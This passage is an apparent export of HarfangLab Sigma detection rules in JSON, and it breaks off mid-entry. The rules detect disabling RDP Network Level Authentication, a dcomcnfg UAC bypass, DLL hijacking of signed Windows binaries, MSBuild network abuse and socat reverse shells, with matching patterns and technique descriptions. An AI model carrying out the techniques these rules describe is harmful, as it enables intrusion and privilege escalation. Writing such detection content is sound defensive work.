'|?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe|?:\\Windows\\System32\\services.exe|'\n\n exclusion_immersivecontrolpanel:\n ProcessImage: '?:\\Windows\\System32\\SystemPropertiesProtection.exe'\n ProcessParentImage: '?:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c2271b8c-4c7c-4704-8b7c-2780abf2d9d2",
"rule_name": "NLA for Remote Desktop Services Disabled",
"rule_description": "Detects when the Network Level Authentication (NLA) for Remote Desktop Services (RDP) is disabled via a registry modification.\nNLA is a feature of Remote Desktop Services that requires the connecting user to authenticate themselves before a session is established.\nAdversaries disable it so that any client that can reach the RDP service can establish a session and reach the logon screen without authenticating first, which also exposes the host's pre-authentication RDP attack surface.\nIt is recommended to analyze the process responsible for the disabling of NLA to determine its legitimacy and to look for subsequent suspicious RDP sessions on this host.\n",
"rule_creation_date": "2025-01-28",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c23341a2-b8af-4667-99a9-20eafbc185c2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093666Z",
"creation_date": "2026-03-23T11:45:34.093668Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093673Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1574/001/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_dcomcnfg.yml",
"content": "title: UAC Bypass Executed via dcomcnfg\nid: c23341a2-b8af-4667-99a9-20eafbc185c2\ndescription: |\n Detects the dcomcnfg.exe UAC bypass, in which dcomcnfg.exe loads an mscoree.dll or ole32.dll from the System32 path that is not signed by Microsoft, indicating DLL hijacking.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the unsigned DLL creation and loading to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1574/001/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/10\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: 'Windows\\System32\\dcomcnfg.exe'\n ImageLoaded:\n - '?:\\Windows\\System32\\mscoree.dll'\n - '?:\\Windows\\System32\\ole32.dll'\n\n filter_microsoft_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c23341a2-b8af-4667-99a9-20eafbc185c2",
"rule_name": "UAC Bypass Executed via dcomcnfg",
"rule_description": "Detects the dcomcnfg.exe UAC bypass, in which dcomcnfg.exe loads an mscoree.dll or ole32.dll from the System32 path that is not signed by Microsoft, indicating DLL hijacking.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the unsigned DLL creation and loading to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-10",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c233ca54-5e73-43b6-adc2-3649981c36cd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610896Z",
"creation_date": "2026-03-23T11:45:34.610899Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610906Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/pr0xylife/status/1547703381262680064",
"https://attack.mitre.org/techniques/T1203/"
],
"name": "t1203_calc_spawning_suspicious_processes.yml",
"content": "title: Suspicious Process Started by Windows Calculator\nid: c233ca54-5e73-43b6-adc2-3649981c36cd\ndescription: |\n Detects processes started by the Windows Calculator.\n Apart from launching win32calc.exe or the Windows Error Reporting process (both excluded below), the Calculator is not expected to spawn any process, therefore this behaviour is suspicious.\n This behaviour was spotted in a Qakbot sample from a July 2022 campaign that used DLL sideloading in calc.exe to load a malicious DLL, which then spawned dangerous processes.\n It is recommended to investigate the parent process for suspicious activities and any suspicious DLL that was loaded by `calc.exe`.\nreferences:\n - https://twitter.com/pr0xylife/status/1547703381262680064\n - https://attack.mitre.org/techniques/T1203/\ndate: 2022/07/19\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.Qakbot\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\calc.exe'\n\n exclusion_win32calc:\n Image:\n - '?:\\Windows\\System32\\win32calc.exe'\n - '?:\\Windows\\SysWOW64\\win32calc.exe'\n\n exclusion_werfault:\n Image|endswith: '\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n OriginalFileName: 'WerFault.exe'\n Signed: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c233ca54-5e73-43b6-adc2-3649981c36cd",
"rule_name": "Suspicious Process Started by Windows Calculator",
"rule_description": "Detects processes started by the Windows Calculator.\nApart from launching win32calc.exe or the Windows Error Reporting process (both excluded by the rule), the Calculator is not expected to spawn any process, therefore this behaviour is suspicious.\nThis behaviour was spotted in a Qakbot sample from a July 2022 campaign that used DLL sideloading in calc.exe to load a malicious DLL, which then spawned dangerous processes.\nIt is recommended to investigate the parent process for suspicious activities and any suspicious DLL that was loaded by `calc.exe`.\n",
"rule_creation_date": "2022-07-19",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1203"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c23abf05-c69f-4583-854c-e55eafb78322",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622291Z",
"creation_date": "2026-03-23T11:45:34.622293Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622297Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/building-bypass-with-msbuild/",
"https://github.com/cobbr/Covenant",
"https://attack.mitre.org/techniques/T1127/001/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1127_001_msbuild_suspicious_network_communication.yml",
"content": "title: Suspicious MSBuild.exe Network Communication\nid: c23abf05-c69f-4583-854c-e55eafb78322\ndescription: |\n Detects MSBuild.exe executions initiated by uncommon parent processes that subsequently perform network activity, which may indicate abuse of MSBuild for defense evasion or malicious payload execution.\n Attackers may leverage MSBuild.exe to execute malicious tasks that perform network communication while masquerading as a legitimate build process.\n For example, Covenant, a collaborative cross-platform .NET command-and-control (C2) framework designed for red team operations, used this technique to bypass application whitelisting and execute malicious code via MSBuild.exe.\n It is recommended to investigate the parent process for malicious actions or content as well as subsequent suspicious actions stemming from the MSBuild process itself.\nreferences:\n - https://blog.talosintelligence.com/building-bypass-with-msbuild/\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1127/001/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2021/11/10\nmodified: 2026/01/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1127.001\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.LOLBin.Msbuild\n - classification.Windows.Framework.Covenant\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n - Image|endswith: '\\MSBuild.exe'\n - ProcessOriginalFileName: 'MSBuild.exe'\n\n exclusion_devenv:\n # C:\\Program Files\\Microsoft Visual Studio\\2022\\Enterprise\\Common7\\IDE\\devenv.exe\n # C:\\Program Files\\Microsoft Visual Studio\\2022\\Professional\\Common7\\IDE\\devenv.exe\n # C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\devenv.exe\n - ProcessParentImage:\n - '?:\\Program Files\\Microsoft Visual 
Studio\\\\*\\Common7\\IDE\\devenv.exe'\n - '?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\Common7\\IDE\\devenv.exe'\n - '?:\\Program Files\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\MSBuild.exe'\n - '?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\MSBuild.exe'\n - '?:\\Program Files\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\amd64\\MSBuild.exe'\n - '?:\\Program Files (x86)\\Microsoft Visual Studio\\\\*\\MSBuild\\Current\\Bin\\amd64\\MSBuild.exe'\n - ProcessParentImage|endswith: '\\IDE\\devenv.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_jetbrains:\n - ProcessCommandLine:\n - '?:\\Program Files\\JetBrains\\JetBrains Rider*\\tools\\MSBuild\\Current\\Bin\\\\*\\MSBuild.exe'\n - '?:\\Program Files (x86)\\JetBrains\\JetBrains Rider*\\tools\\MSBuild\\Current\\Bin\\\\*\\MSBuild.exe'\n - ProcessParentImage:\n - '?:\\Program Files\\JetBrains\\Rider\\\\*\\Rider.Backend.exe'\n - '?:\\Program Files (x86)\\JetBrains\\Rider\\\\*\\Rider.Backend.exe'\n\n exclusion_citrix:\n ProcessCommandLine:\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\installutil.exe /u /LogFile= ?:\\Program Files (x86)\\Citrix\\System32\\ConfigMgrImpl.dll'\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\installutil.exe /u /LogFile= ?:\\Program Files (x86)\\Citrix\\Console MetaFrame Password Manager\\ADToolTraceModule.dll'\n - '?:\\Windows\\Microsoft.NET\\Framework\\v*\\installutil.exe /u /LogFile= ?:\\Program Files (x86)\\Citrix\\Console MetaFrame Password Manager\\PasswordManagerExtension.dll'\n\n # Request to api.nuget.org\n exclusion_nuget:\n ProcessParentCommandLine|contains: '?:\\Program Files\\Microsoft Visual Studio\\\\*\\Community\\Common7\\Tools\\VsDevCmd.bat'\n\n exclusion_blend:\n ProcessParentImage|endswith: '\\IDE\\Blend.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n exclusion_jenkins:\n ProcessAncestors|contains:\n - 
'\\bin\\java.exe|?:\\Program Files\\Jenkins\\jenkins.exe|'\n - '\\bin\\java.exe|?:\\Program Files (x86)\\Jenkins\\jenkins.exe|'\n\n exclusion_vscode:\n - ProcessParentImage|endswith: '\\globalStorage\\microsoft-isvexptools.powerplatform-vscode\\pac\\tools\\pac.exe'\n - ProcessAncestors|contains:\n - '\\Microsoft VS Code\\Code.exe|?:\\Windows\\explorer.exe|'\n - '\\Microsoft VS Code\\Code.exe|?:\\Windows\\System32\\OpenWith.exe|'\n\n exclusion_cursor:\n ProcessGrandparentImage: '?:\\Program Files\\cursor\\Cursor.exe'\n\n exclusion_unity:\n ProcessParentImage: '?:\\Program Files\\Unity\\Hub\\Editor\\\\*\\Editor\\Unity.exe'\n\n exclusion_restore:\n ProcessCommandLine|contains: 'MSBuild.exe /t:restore'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c23abf05-c69f-4583-854c-e55eafb78322",
"rule_name": "Suspicious MSBuild.exe Network Communication",
"rule_description": "Detects MSBuild.exe executions initiated by uncommon parent processes that subsequently perform network activity, which may indicate abuse of MSBuild for defense evasion or malicious payload execution.\nAttackers may leverage MSBuild.exe to execute malicious tasks that perform network communication while masquerading as a legitimate build process.\nFor example, Covenant, a collaborative cross-platform .NET command-and-control (C2) framework designed for red team operations, used this technique to bypass application whitelisting and execute malicious code via MSBuild.exe.\nIt is recommended to investigate the parent process for malicious actions or content as well as subsequent suspicious actions stemming from the MSBuild process itself.\n",
"rule_creation_date": "2021-11-10",
"rule_modified_date": "2026-01-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1071",
"attack.t1127.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c2565e8e-4b35-4493-8cab-0b47b8283d74",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599148Z",
"creation_date": "2026-03-23T11:45:34.599152Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599160Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_vssvc.yml",
"content": "title: DLL Hijacking via vssvc.exe\nid: c2565e8e-4b35-4493-8cab-0b47b8283d74\ndescription: |\n Detects potential Windows DLL hijacking via vssvc.exe: a vssvc.exe bearing the Microsoft Windows signature runs outside the Windows system directories and loads one of its known DLL dependencies from a non-system path, and the loaded DLL is not signed by Microsoft.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'vssvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AUTHZ.dll'\n - '\\bcd.dll'\n - '\\DEVOBJ.dll'\n - '\\FLTLIB.DLL'\n - '\\VirtDisk.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c2565e8e-4b35-4493-8cab-0b47b8283d74",
"rule_name": "DLL Hijacking via vssvc.exe",
"rule_description": "Detects potential Windows DLL hijacking via vssvc.exe: a vssvc.exe bearing the Microsoft Windows signature runs outside the Windows system directories and loads one of its known DLL dependencies from a non-system path, and the loaded DLL is not signed by Microsoft.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c25909aa-c7f1-4d63-a951-d7e1057f35c8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619093Z",
"creation_date": "2026-03-23T11:45:34.619094Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619099Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_deviceenroller.yml",
"content": "title: DLL Hijacking via deviceenroller.exe\nid: c25909aa-c7f1-4d63-a951-d7e1057f35c8\ndescription: |\n Detects potential Windows DLL hijacking via deviceenroller.exe: a deviceenroller.exe bearing the Microsoft Windows signature runs outside the Windows system directories and loads one of its known DLL dependencies from a non-system path, and the loaded DLL is not signed by Microsoft.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'deviceenroller.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\dmenterprisediagnostics.dll'\n - '\\iri.dll'\n - '\\netutils.dll'\n - '\\omadmapi.dll'\n - '\\samcli.dll'\n - '\\sspicli.dll'\n - '\\umpdc.dll'\n - '\\USERENV.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 
'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c25909aa-c7f1-4d63-a951-d7e1057f35c8",
"rule_name": "DLL Hijacking via deviceenroller.exe",
"rule_description": "Detects potential Windows DLL hijacking via deviceenroller.exe: a deviceenroller.exe bearing the Microsoft Windows signature runs outside the Windows system directories and loads one of its known DLL dependencies from a non-system path, and the loaded DLL is not signed by Microsoft.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c29f3873-fe52-4a98-9051-07faf06bd8b7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089090Z",
"creation_date": "2026-03-23T11:45:34.089093Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089097Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://gtfobins.github.io/gtfobins/socat/",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_reverse_shell_socat_linux.yml",
"content": "title: Reverse Shell Executed via Socat\nid: c29f3873-fe52-4a98-9051-07faf06bd8b7\ndescription: |\n Detects socat command lines that combine a TCP or UDP connect address with an EXEC address using the pty and stderr options, a pattern typical of reverse shells.\n A reverse shell is a shell session that is initiated from the victim's machine towards the attacker's.\n Attackers often use reverse shells to bypass firewall restrictions.\n It is recommended to investigate remote network connections made by socat, as well as the command-line and the execution context to determine if this action was legitimate.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://gtfobins.github.io/gtfobins/socat/\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/07/01\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Socat\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_protocol:\n CommandLine|contains:\n - 'TCP:'\n - 'TCP4:'\n - 'TCP6:'\n - 'TCP-CONNECT:'\n - 'TCP4-CONNECT:'\n - 'TCP6-CONNECT:'\n - 'UDP:'\n - 'UDP4:'\n - 'UDP6:'\n - 'UDP-CONNECT:'\n - 'UDP4-CONNECT:'\n - 'UDP6-CONNECT:'\n selection_command:\n CommandLine|contains|all:\n - 'EXEC:'\n - 'pty'\n - 'stderr'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c29f3873-fe52-4a98-9051-07faf06bd8b7",
"rule_name": "Reverse Shell Executed via Socat",
"rule_description": "Detects socat command lines that combine a TCP or UDP connect address with an EXEC address using the pty and stderr options, a pattern typical of reverse shells.\nA reverse shell is a shell session that is initiated from the victim's machine towards the attacker's.\nAttackers often use reverse shells to bypass firewall restrictions.\nIt is recommended to investigate remote network connections made by socat, as well as the command-line and the execution context to determine if this action was legitimate.\n",
"rule_creation_date": "2022-07-01",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c29f3873-fe52-4a98-9051-07fafddf1237",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089376Z",
"creation_date": "2026-03-23T11:45:34.089379Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089384Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://github.com/t3l3machus/Villain",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_backdoor_villain.yml",
